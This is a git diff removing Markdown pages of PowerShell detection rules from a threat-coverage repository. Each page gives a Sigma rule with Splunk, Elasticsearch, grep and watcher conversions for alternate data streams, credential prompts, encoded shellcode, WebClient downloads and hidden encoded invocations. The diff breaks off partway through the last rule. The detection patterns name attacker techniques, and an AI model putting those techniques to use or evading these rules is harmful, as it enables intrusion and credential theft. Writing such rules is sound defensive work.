-| **References**           | <ul><li>[http://www.powertheshell.com/ntfsstreams/](http://www.powertheshell.com/ntfsstreams/)</li></ul>  |
-| **Author**               | Sami Ruohonen |
-| Other Tags           | <ul><li>attack.t1564.004</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: NTFS Alternate Data Stream
-id: 8c521530-5169-495d-a199-0a3a881ad24e
-status: experimental
-description: Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
-references:
-    - http://www.powertheshell.com/ntfsstreams/
-tags:
-    - attack.defense_evasion
-    - attack.t1096
-    - attack.t1564.004
-author: Sami Ruohonen
-date: 2018/07/24
-logsource:
-    product: windows
-    service: powershell
-    definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277'
-detection:
-    keyword1:
-        - "set-content"
-        - "add-content"
-    keyword2:
-        - "-stream"
-    condition: keyword1 and keyword2
-falsepositives:
-    - unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {(($_.message -match "set-content" -or $_.message -match "add-content") -and $_.message -match "-stream") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(\*.keyword:(*set\-content* OR *add\-content*) AND "\-stream")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/8c521530-5169-495d-a199-0a3a881ad24e <<EOF
-{
-  "metadata": {
-    "title": "NTFS Alternate Data Stream",
-    "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1096",
-      "attack.t1564.004"
-    ],
-    "query": "(\\*.keyword:(*set\\-content* OR *add\\-content*) AND \"\\-stream\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(\\*.keyword:(*set\\-content* OR *add\\-content*) AND \"\\-stream\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'NTFS Alternate Data Stream'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(\*.keyword:(*set\-content* OR *add\-content*) AND "\-stream")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" ("set-content" OR "add-content") "-stream")
-```
-
-
-### logpoint
-    
-```
-(("set-content" OR "add-content") "-stream")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?:.*set-content|.*add-content)))(?=.*-stream))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_prompt_credentials.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_prompt_credentials.md
deleted file mode 100644
index eaf9b9a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_prompt_credentials.md
+++ /dev/null
@@ -1,181 +0,0 @@
-| Title                    | PowerShell Credential Prompt       |
-|:-------------------------|:------------------|
-| **Description**          | Detects PowerShell calling a credential prompt |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/JohnLaTwC/status/850381440629981184](https://twitter.com/JohnLaTwC/status/850381440629981184)</li><li>[https://t.co/ezOTGy1a1G](https://t.co/ezOTGy1a1G)</li></ul>  |
-| **Author**               | John Lambert (idea), Florian Roth (rule) |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: PowerShell Credential Prompt
-id: ca8b77a9-d499-4095-b793-5d5f330d450e
-status: experimental
-description: Detects PowerShell calling a credential prompt
-references:
-    - https://twitter.com/JohnLaTwC/status/850381440629981184
-    - https://t.co/ezOTGy1a1G
-tags:
-    - attack.execution
-    - attack.credential_access
-    - attack.t1086
-    - attack.t1059.001
-author: John Lambert (idea), Florian Roth (rule)
-date: 2017/04/09
-logsource:
-    product: windows
-    service: powershell
-    definition: 'Script block logging must be enabled'
-detection:
-    selection:
-        EventID: 4104
-    keyword:
-        Message:
-            - '*PromptForCredential*'
-    condition: all of them
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {($_.ID -eq "4104" -and ($_.message -match "Message.*.*PromptForCredential.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"4104" AND Message.keyword:(*PromptForCredential*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/ca8b77a9-d499-4095-b793-5d5f330d450e <<EOF
-{
-  "metadata": {
-    "title": "PowerShell Credential Prompt",
-    "description": "Detects PowerShell calling a credential prompt",
-    "tags": [
-      "attack.execution",
-      "attack.credential_access",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_id:\"4104\" AND Message.keyword:(*PromptForCredential*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"4104\" AND Message.keyword:(*PromptForCredential*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'PowerShell Credential Prompt'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4104" AND Message.keyword:(*PromptForCredential*))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode="4104" (Message="*PromptForCredential*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="4104" Message IN ["*PromptForCredential*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4104)(?=.*(?:.*.*PromptForCredential.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_psattack.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_psattack.md
deleted file mode 100644
index b7276d4..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_psattack.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | PowerShell PSAttack       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the use of PSAttack PowerShell hack tool |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Pentesters</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://adsecurity.org/?p=2921](https://adsecurity.org/?p=2921)</li></ul>  |
-| **Author**               | Sean Metcalf (source), Florian Roth (rule) |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: PowerShell PSAttack
-id: b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5
-status: experimental
-description: Detects the use of PSAttack PowerShell hack tool
-references:
-    - https://adsecurity.org/?p=2921
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-author: Sean Metcalf (source), Florian Roth (rule)
-date: 2017/03/05
-logsource:
-    product: windows
-    service: powershell
-    definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277'
-detection:
-    selection:
-        EventID: 4103
-    keyword:
-        - 'PS ATTACK!!!'
-    condition: all of them
-falsepositives:
-    - Pentesters
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {($_.ID -eq "4103" -and $_.message -match "PS ATTACK!!!") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"4103" AND "PS\ ATTACK\!\!\!")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5 <<EOF
-{
-  "metadata": {
-    "title": "PowerShell PSAttack",
-    "description": "Detects the use of PSAttack PowerShell hack tool",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_id:\"4103\" AND \"PS\\ ATTACK\\!\\!\\!\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"4103\" AND \"PS\\ ATTACK\\!\\!\\!\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'PowerShell PSAttack'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"4103" AND "PS ATTACK\!\!\!")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode="4103" "PS ATTACK!!!")
-```
-
-
-### logpoint
-    
-```
-(event_id="4103" "PS ATTACK!!!")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*4103)(?=.*PS ATTACK!!!))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_remote_powershell_session.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_remote_powershell_session.md
deleted file mode 100644
index 8c119fd..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_remote_powershell_session.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Remote PowerShell Session       |
-|:-------------------------|:------------------|
-| **Description**          | Detects remote PowerShell sessions |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Legitimate use remote PowerShell sessions</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1086_powershell/powershell_remote_session.md](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1086_powershell/powershell_remote_session.md)</li></ul>  |
-| **Author**               | Roberto Rodriguez @Cyb3rWard0g |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Remote PowerShell Session
-id: 96b9f619-aa91-478f-bacb-c3e50f8df575
-description: Detects remote PowerShell sessions
-status: experimental
-date: 2019/08/10
-modified: 2019/11/10
-author: Roberto Rodriguez @Cyb3rWard0g
-references:
-    - https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/02_execution/T1086_powershell/powershell_remote_session.md
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-logsource:
-    product: windows
-    service: powershell
-detection:
-    selection:
-        EventID:
-            - 4103
-            - 400
-        HostName: 'ServerRemoteHost'
-        HostApplication|contains: 'wsmprovhost.exe'
-    condition: selection
-falsepositives:
-    - Legitimate use remote PowerShell sessions
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {(($_.ID -eq "4103" -or $_.ID -eq "400") -and $_.message -match "HostName.*ServerRemoteHost" -and $_.message -match "HostApplication.*.*wsmprovhost.exe.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:("4103" OR "400") AND HostName:"ServerRemoteHost" AND HostApplication.keyword:*wsmprovhost.exe*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/96b9f619-aa91-478f-bacb-c3e50f8df575 <<EOF
-{
-  "metadata": {
-    "title": "Remote PowerShell Session",
-    "description": "Detects remote PowerShell sessions",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "(winlog.event_id:(\"4103\" OR \"400\") AND HostName:\"ServerRemoteHost\" AND HostApplication.keyword:*wsmprovhost.exe*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:(\"4103\" OR \"400\") AND HostName:\"ServerRemoteHost\" AND HostApplication.keyword:*wsmprovhost.exe*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Remote PowerShell Session'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:("4103" "400") AND HostName:"ServerRemoteHost" AND HostApplication.keyword:*wsmprovhost.exe*)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" (EventCode="4103" OR EventCode="400") HostName="ServerRemoteHost" HostApplication="*wsmprovhost.exe*")
-```
-
-
-### logpoint
-    
-```
-(event_id IN ["4103", "400"] HostName="ServerRemoteHost" HostApplication="*wsmprovhost.exe*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*4103|.*400))(?=.*ServerRemoteHost)(?=.*.*wsmprovhost\.exe.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_shellcode_b64.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_shellcode_b64.md
deleted file mode 100644
index 01afabc..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_shellcode_b64.md
+++ /dev/null
@@ -1,184 +0,0 @@
-| Title                    | PowerShell ShellCode       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Base64 encoded Shellcode |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1055: Process Injection](https://attack.mitre.org/techniques/T1055)</li><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li><li>[T1059: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1055: Process Injection](../Triggers/T1055.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/cyb3rops/status/1063072865992523776](https://twitter.com/cyb3rops/status/1063072865992523776)</li></ul>  |
-| **Author**               | David Ledbetter (shellcode), Florian Roth (rule) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: PowerShell ShellCode
-id: 16b37b70-6fcf-4814-a092-c36bd3aafcbd
-status: experimental
-description: Detects Base64 encoded Shellcode
-references:
-    - https://twitter.com/cyb3rops/status/1063072865992523776
-tags:
-    - attack.privilege_escalation
-    - attack.execution
-    - attack.t1055
-    - attack.t1086
-    - attack.t1059
-author: David Ledbetter (shellcode), Florian Roth (rule)
-date: 2018/11/17
-logsource:
-    product: windows
-    service: powershell
-    description: 'Script block logging must be enabled'
-detection:
-    selection:
-        EventID: 4104
-    keyword1:
-        - '*AAAAYInlM*'
-    keyword2:
-        - '*OiCAAAAYInlM*'
-        - '*OiJAAAAYInlM*'
-    condition: selection and keyword1 and keyword2
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {(($_.ID -eq "4104" -and $_.message -match "*AAAAYInlM*") -and ($_.message -match "*OiCAAAAYInlM*" -or $_.message -match "*OiJAAAAYInlM*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_id:"4104" AND "*AAAAYInlM*") AND \*.keyword:(*OiCAAAAYInlM* OR *OiJAAAAYInlM*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/16b37b70-6fcf-4814-a092-c36bd3aafcbd <<EOF
-{
-  "metadata": {
-    "title": "PowerShell ShellCode",
-    "description": "Detects Base64 encoded Shellcode",
-    "tags": [
-      "attack.privilege_escalation",
-      "attack.execution",
-      "attack.t1055",
-      "attack.t1086",
-      "attack.t1059"
-    ],
-    "query": "((winlog.event_id:\"4104\" AND \"*AAAAYInlM*\") AND \\*.keyword:(*OiCAAAAYInlM* OR *OiJAAAAYInlM*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_id:\"4104\" AND \"*AAAAYInlM*\") AND \\*.keyword:(*OiCAAAAYInlM* OR *OiJAAAAYInlM*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'PowerShell ShellCode'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"4104" AND "*AAAAYInlM*") AND \*.keyword:(*OiCAAAAYInlM* OR *OiJAAAAYInlM*))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" (EventCode="4104" "*AAAAYInlM*") ("*OiCAAAAYInlM*" OR "*OiJAAAAYInlM*"))
-```
-
-
-### logpoint
-    
-```
-((event_id="4104" "*AAAAYInlM*") ("*OiCAAAAYInlM*" OR "*OiJAAAAYInlM*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*4104)(?=.*.*AAAAYInlM.*)))(?=.*(?:.*(?:.*.*OiCAAAAYInlM.*|.*.*OiJAAAAYInlM.*))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_download.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_download.md
deleted file mode 100644
index 736bdd4..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_download.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Suspicious PowerShell Download       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious PowerShell download command |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>PowerShell scripts that download content from the Internet</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious PowerShell Download
-id: 65531a81-a694-4e31-ae04-f8ba5bc33759
-status: experimental
-description: Detects suspicious PowerShell download command
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-author: Florian Roth
-date: 2017/03/05
-modified: 2020/03/25
-logsource:
-    product: windows
-    service: powershell
-detection:
-    downloadfile:
-        Message|contains|all:
-            - 'System.Net.WebClient'
-            - '.DownloadFile('
-    downloadstring:
-        Message|contains|all:
-            - 'System.Net.WebClient'
-            - '.DownloadString('
-    condition: downloadfile or downloadstring
-falsepositives:
-    - PowerShell scripts that download content from the Internet
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {($_.message -match "Message.*.*System.Net.WebClient.*" -and ($_.message -match "Message.*.*.DownloadFile(.*" -or $_.message -match "Message.*.*.DownloadString(.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(Message.keyword:*System.Net.WebClient* AND (Message.keyword:*.DownloadFile\(* OR Message.keyword:*.DownloadString\(*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/65531a81-a694-4e31-ae04-f8ba5bc33759 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious PowerShell Download",
-    "description": "Detects suspicious PowerShell download command",
-    "tags": [
-      "attack.execution",
-      "attack.t1086",
-      "attack.t1059.001"
-    ],
-    "query": "(Message.keyword:*System.Net.WebClient* AND (Message.keyword:*.DownloadFile\\(* OR Message.keyword:*.DownloadString\\(*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(Message.keyword:*System.Net.WebClient* AND (Message.keyword:*.DownloadFile\\(* OR Message.keyword:*.DownloadString\\(*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious PowerShell Download'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Message.keyword:*System.Net.WebClient* AND (Message.keyword:*.DownloadFile\(* OR Message.keyword:*.DownloadString\(*))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-PowerShell/Operational" Message="*System.Net.WebClient*" (Message="*.DownloadFile(*" OR Message="*.DownloadString(*"))
-```
-
-
-### logpoint
-    
-```
-(Message="*System.Net.WebClient*" (Message="*.DownloadFile(*" OR Message="*.DownloadString(*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*System\.Net\.WebClient.*)(?=.*(?:.*(?:.*.*\.DownloadFile\(.*|.*.*\.DownloadString\(.*))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_invocation_generic.md b/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_invocation_generic.md
deleted file mode 100644
index 4f960be..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_invocation_generic.md
+++ /dev/null
@@ -1,181 +0,0 @@
-| Title                    | Suspicious PowerShell Invocations - Generic       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious PowerShell invocation command parameters |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0036_4104_windows_powershell_script_block](../Data_Needed/DN0036_4104_windows_powershell_script_block.md)</li><li>[DN0037_4103_windows_powershell_executing_pipeline](../Data_Needed/DN0037_4103_windows_powershell_executing_pipeline.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Penetration tests</li><li>Very special / sneaky PowerShell scripts</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth (rule) |
-| Other Tags           | <ul><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious PowerShell Invocations - Generic
-id: 3d304fda-78aa-43ed-975c-d740798a49c1
-status: experimental
-description: Detects suspicious PowerShell invocation command parameters
-tags:
-    - attack.execution
-    - attack.t1086
-    - attack.t1059.001
-author: Florian Roth (rule)
-date: 2017/03/12
-logsource:
-    product: windows
-    service: powershell
-detection:
-    encoded:
-        - ' -enc '
-        - ' -EncodedCommand '
-    hidden:
-        - ' -w hidden '
-        - ' -window hidden '
-        - ' -windowstyle hidden '
-    noninteractive:
-        - ' -noni '
-        - ' -noninteractive '
-    condition: all of them
-falsepositives:
-    - Penetration tests
